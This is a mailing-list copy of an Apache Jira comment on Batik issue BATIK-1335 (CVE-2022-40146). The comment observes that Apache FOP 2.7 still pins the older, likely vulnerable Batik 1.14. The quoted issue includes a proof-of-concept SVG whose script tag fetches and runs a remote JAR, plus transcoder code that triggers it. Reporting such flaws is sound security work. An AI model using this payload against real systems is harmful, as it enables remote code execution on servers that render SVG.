[ 
https://issues.apache.org/jira/browse/BATIK-1335?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17629594#comment-17629594
 ] 

David Campbell commented on BATIK-1335:
---------------------------------------

I understand this is the fix for CVE-2022-40146 - eg 
[https://nvd.nist.gov/vuln/detail/CVE-2022-40146]

I also notice that this fix hasn't rolled out in terms of inclusion for example 
to a new build of Apache FOP, eg 
[https://repo1.maven.org/maven2/org/apache/xmlgraphics/fop-parent/2.7/fop-parent-2.7.pom]

which still references the build prior so could be vulnerable:
<batik.version>{*}1.14{*}</batik.version>
 

> Jar url should be blocked by DefaultScriptSecurity
> --------------------------------------------------
>
>                 Key: BATIK-1335
>                 URL: https://issues.apache.org/jira/browse/BATIK-1335
>             Project: Batik
>          Issue Type: Bug
>            Reporter: Simon Steiner
>            Assignee: Simon Steiner
>            Priority: Major
>             Fix For: 1.15
>
>
> <svg xmlns="http://www.w3.org/2000/svg";
> xmlns:xlink="http://www.w3.org/1999/xlink"; width="450" height="500"
> viewBox="0 0 450 500">
>     <script type="application/java-archive"
> xlink:href="jar:http://192.168.1.10/poc.jar!/";></script>
> </svg>
> should be blocked when using:
>         JPEGTranscoder t = new JPEGTranscoder();
>         t.addTranscodingHint(JPEGTranscoder.KEY_EXECUTE_ONLOAD, Boolean.TRUE);
>         t.addTranscodingHint(JPEGTranscoder.KEY_ALLOWED_SCRIPT_TYPES, 
> "application/java-archive,");
>         FileInputStream stream = new FileInputStream("test.svg");
>         TranscoderInput input = new TranscoderInput(stream);
>         FileOutputStream fos = new FileOutputStream("out.jpg");
>         TranscoderOutput output = new TranscoderOutput(fos);
>         t.transcode(input, output);
>         fos.close();
> CVE-2022-40146



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

---------------------------------------------------------------------
To unsubscribe, e-mail: batik-dev-unsubscr...@xmlgraphics.apache.org
For additional commands, e-mail: batik-dev-h...@xmlgraphics.apache.org

Reply via email to